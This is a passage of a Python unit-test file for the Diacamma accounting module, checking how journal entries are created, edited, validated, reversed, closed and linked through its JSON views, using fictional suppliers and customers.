self.assert_json_equal('LABELFORM', 'account', '[401] 401')
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '152.34')
self.assert_json_equal('SELECT', 'third', '0')
self.assert_json_equal('BUTTON', 'new-third', '')
self.assert_action_equal('POST', '#new-third/action', ('Créer', 'images/new.png', 'diacamma.accounting', 'thirdAdd', 0, 1, 1, {'new_account': '401'}))
self.assert_select_equal('third', 5) # nb=5
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 4)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|", 'debit_val': '0.0',
'credit_val': '152.34', 'entrylineaccount_serial': '-1', 'third': '3', 'num_cpt': '4'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountValidate")
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-1|4|3|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|", 'entrylineaccount_serial': '-1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 6)
self.assert_json_equal('LABELFORM', 'account', '[401] 401')
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '152.34')
self.assert_json_equal('SELECT', 'third', '3')
self.assert_json_equal('BUTTON', 'new-third', '')
self.assert_select_equal('third', 5) # nb=5
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 4)
def test_edit_line(self):
CostAccounting.objects.create(name='close', description='Close cost', status=1, is_default=False)
CostAccounting.objects.create(name='open', description='Open cost', status=0, is_default=True)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|2|87.230000|0|0|None|\n-2|11|0|87.230000|2|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': 1, 'debit_val': 0, 'date_value': '2015-02-13', 'num_cpt_txt': '', 'credit_val': 0,
'entrylineaccount_serial': -2,
'serial_entry': '-1|4|2|87.230000|0|0|None|\n-2|11|0|87.230000|2|0|None|',
'journal': 2, 'designation': 'un plein cadie', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 5)
self.assert_json_equal('LABELFORM', 'account', '[601] 601')
self.assert_json_equal('FLOAT', 'debit_val', '87.23')
self.assert_json_equal('FLOAT', 'credit_val', '0')
self.assert_json_equal('SELECT', 'costaccounting', '2')
self.assert_select_equal('costaccounting', 2) # nb=2
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 11)
def test_change_line_payoff(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '3',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': '1', 'journal': '3', 'entryaccount': '1', 'reference': '',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|3|0|152.340000|0|0|aaabbb|", 'entrylineaccount_serial': '-2'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 5)
self.assert_json_equal('LABELFORM', 'account', '[531] 531')
self.assert_json_equal('FLOAT', 'debit_val', '152.34')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assert_json_equal('EDIT', 'reference', 'aaabbb')
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 3)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '3', 'entryaccount': '1',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|3|0|152.340000|0|0|aaabbb|", 'debit_val': '152.34',
'credit_val': '0.0', 'entrylineaccount_serial': '-2', 'reference': 'ccdd', 'num_cpt': '3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "3")
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 1)
serial_value = self.response_json['action']['params']['serial_entry']
self.assertEqual(serial_value[-25:], "|3|0|152.340000|0|0|ccdd|")
def test_valid_entry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '2', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('LABELFORM', 'result', [0.00, 152.34, -152.34, 0.00, 0.00])
self.factory.xfer = EntryAccountOpenFromLine()
self.calljson('/diacamma.accounting/entryAccountOpenFromLine',
{'year': '1', 'journal': '2', 'filter': '0', 'entryline': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountOpenFromLine')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 5)
self.assertEqual(self.json_context['filter'], "0")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.assertEqual(self.json_context['entryaccount'], 1)
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '1', 'journal': '2', "entryline": "1"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '2', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', '1')
self.assert_json_equal('', 'entryline/@0/entry.date_entry', date.today())
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('LABELFORM', 'result', [0.00, 152.34, -152.34, 0.00, 0.00])
self.factory.xfer = EntryAccountOpenFromLine()
self.calljson('/diacamma.accounting/entryAccountOpenFromLine',
{'year': '1', 'journal': '2', 'filter': '0', 'entryline': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountOpenFromLine')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountShow")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 5)
self.assertEqual(self.json_context['filter'], "0")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.assertEqual(self.json_context['entryaccount'], 1)
self.factory.xfer = EntryAccountShow()
self.calljson('/diacamma.accounting/entryAccountShow',
{'year': '1', 'journal': '2', 'filter': '0', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountShow')
self.assert_count_equal('', 8)
self.assert_json_equal('LABELFORM', 'num', '1')
self.assert_json_equal('LABELFORM', 'journal', 'Achats')
self.assert_json_equal('LABELFORM', 'date_entry', date.today().isoformat(), True)
self.assert_json_equal('LABELFORM', 'date_value', '2015-02-13')
self.assert_json_equal('LABELFORM', 'designation', 'un plein cadie')
self.assert_count_equal('entrylineaccount', 2)
self.assert_json_equal('', 'entrylineaccount/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount/@1/costaccounting', None)
self.assert_count_equal('#entrylineaccount/actions', 0)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountCreateLinked")
self.factory.xfer = CostAccountingAddModify()
self.calljson('/diacamma.accounting/costAccountingAddModify', {"SAVE": "YES", 'name': 'aaa', 'description': 'aaa', 'year': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'costAccountingAddModify') # id = 3
self.factory.xfer = EntryAccountShow()
self.calljson('/diacamma.accounting/entryAccountShow',
{'year': '1', 'journal': '2', 'filter': '0', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountShow')
self.assert_count_equal('entrylineaccount', 2)
self.assert_json_equal('', 'entrylineaccount/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount/@1/costaccounting', None)
self.assert_count_equal('#entrylineaccount/actions', 1)
self.assertEqual(len(self.json_actions), 2)
def test_show_close_cost(self):
fill_entries_fr(1)
self.factory.xfer = EntryAccountOpenFromLine()
self.calljson('/diacamma.accounting/entryAccountOpenFromLine',
{'year': '1', 'journal': '0', 'filter': '0', 'entryline': '23'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountOpenFromLine')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountShow")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 5)
self.assertEqual(self.json_context['filter'], "0")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "0")
self.assertEqual(self.json_context['entryaccount'], 11)
self.factory.xfer = EntryAccountShow()
self.calljson('/diacamma.accounting/entryAccountShow',
{'year': '1', 'journal': '0', 'filter': '0', 'entryaccount': '11'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountShow')
self.assert_count_equal('', 8)
self.assert_json_equal('LABELFORM', 'num', '7')
self.assert_json_equal('LABELFORM', 'journal', 'Opérations diverses')
self.assert_json_equal('LABELFORM', 'date_value', '2015-02-20')
self.assert_json_equal('LABELFORM', 'designation', 'Frais bancaire')
self.assert_count_equal('entrylineaccount', 2)
self.assert_json_equal('', 'entrylineaccount/@0/entry_account', '[512] 512')
self.assert_json_equal('', 'entrylineaccount/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount/@1/entry_account', '[627] 627')
self.assert_json_equal('', 'entrylineaccount/@1/costaccounting', 'close')
self.assert_count_equal('#entrylineaccount/actions', 0)
self.assertEqual(len(self.json_actions), 1)
def test_inverse_entry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assertEqual(len(self.json_actions), 5)
self.assertEqual(self.json_actions[1]['id'], "diacamma.accounting/entryAccountClose")
self.assertEqual(self.json_actions[2]['id'], "diacamma.accounting/entryAccountCreateLinked")
self.assertEqual(self.json_actions[3]['id'], "diacamma.accounting/entryAccountReverse")
self.factory.xfer = EntryAccountReverse()
self.calljson('/diacamma.accounting/entryAccountReverse',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountReverse')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 14)
self.assert_json_equal('LABELFORM', 'asset_warning', "écriture d'un avoir")
self.assert_json_equal('', '#asset_warning/formatstr', "{[center]}{[i]}%s{[/i]}{[/center]}")
def test_valid_payment(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountCreateLinked()
self.calljson('/diacamma.accounting/entryAccountCreateLinked',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountCreateLinked')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 5)
self.assertEqual(self.response_json['action']['params']['entryaccount'], 2)
self.assertEqual(self.response_json['action']['params']['linked_entryaccount'], 1)
self.assertEqual(self.response_json['action']['params']['serial_entry'][-26:-1], "|4|3|-152.340000|0|0|None")
self.assertEqual(self.response_json['action']['params']['num_cpt_txt'], "5")
self.assertEqual(self.response_json['action']['params']['journal'], "4")
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '4', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.assert_json_equal('SELECT', 'journal', '4')
self.assert_json_equal('DATE', 'date_value', '2015-12-31')
self.assert_json_equal('EDIT', 'designation', 'règlement de un plein cadie')
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('EDIT', 'num_cpt_txt', '5')
self.assert_json_equal('SELECT', 'num_cpt', '2')
self.assert_select_equal('num_cpt', 2) # nb=2
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '152.34')
self.assert_json_equal('EDIT', 'reference', '')
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '2', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|\n-4|2|0|-152.340000|0|0|Ch N°12345|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[512] 512')
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', 'Ch N°12345')
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None||\n-4|2|0|-152.340000|0|0|Ch N°12345|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 4)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', 'A')
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@2/entry.num', None)
self.assert_json_equal('', 'entryline/@2/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2015-12-31')
self.assert_json_equal('', 'entryline/@2/link', 'A')
self.assert_json_equal('', 'entryline/@2/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@2/debit', -152.34)
self.assert_json_equal('', 'entryline/@3/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@3/link', None)
self.assert_json_equal('LABELFORM', 'result', [0.00, 152.34, -152.34, -152.34, 0.00])
def test_valid_payment_canceled(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.assertEqual(1, EntryAccount.objects.all().count())
self.factory.xfer = EntryAccountCreateLinked()
self.calljson('/diacamma.accounting/entryAccountCreateLinked',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountCreateLinked')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 5)
self.assertEqual(self.response_json['action']['params']['serial_entry'][-26:-1], "|4|3|-152.340000|0|0|None")
self.assertEqual(len(self.json_context), 3)
self.assertEqual(2, EntryAccount.objects.all().count())
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '4', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.factory.xfer = EntryAccountUnlock()
self.calljson('/diacamma.accounting/entryAccountUnlock', {'year': '1', 'journal': '4', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountUnlock')
self.assertEqual(1, EntryAccount.objects.all().count())
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
def test_link_unlink_entries(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-04-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '4', 'date_value': '2015-05-03',
'designation': 'Règlement de belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '4', 'entryaccount': '2',
'serial_entry': "-9|1|5|-364.91|0|0|None|\n-8|2|0|364.91|0|0|BP N°987654|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '5',
'date_value': '2015-04-27', 'designation': 'divers'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '3',
'serial_entry': "-11|1|6|-364.91|0|0|None|\n-12|1|5|250.61|0|0|None|\n-13|1|7|114.30|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 7)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-04-27')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '1')
self.assert_json_equal('', 'entryline/@1/entry_account', '[706] 706')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/id', '6')
self.assert_json_equal('', 'entryline/@2/entry_account', "[411 Dalton William]")
self.assert_json_equal('', 'entryline/@2/debit', -250.61)
self.assert_json_equal('', 'entryline/@3/id', '5')
self.assert_json_equal('', 'entryline/@3/entry_account', "[411 Dalton Jack]")
self.assert_json_equal('', 'entryline/@3/credit', 364.91)
self.assert_json_equal('', 'entryline/@4/id', '7')
self.assert_json_equal('', 'entryline/@4/entry_account', "[411 Dalton Joe]")
self.assert_json_equal('', 'entryline/@4/debit', -114.30)
self.assert_json_equal('', 'entryline/@5/id', '3')
self.assert_json_equal('', 'entryline/@5/entry.num', None)
self.assert_json_equal('', 'entryline/@5/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@5/entry.date_value', '2015-05-03')
self.assert_json_equal('', 'entryline/@5/link', None)
self.assert_json_equal('', 'entryline/@5/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@5/credit', 364.91)
self.assert_json_equal('', 'entryline/@5/costaccounting', None)
self.assert_json_equal('', 'entryline/@6/id', '4')
self.assert_json_equal('', 'entryline/@6/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@6/designation_ref', 'Règlement de belle facture{[br/]}BP N°987654')
self.assert_json_equal('', 'entryline/@6/costaccounting', None)
self.assert_json_equal('LABELFORM', 'result', [364.91, 0.00, 364.91, 364.91, 0.00])
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;3'}, False)
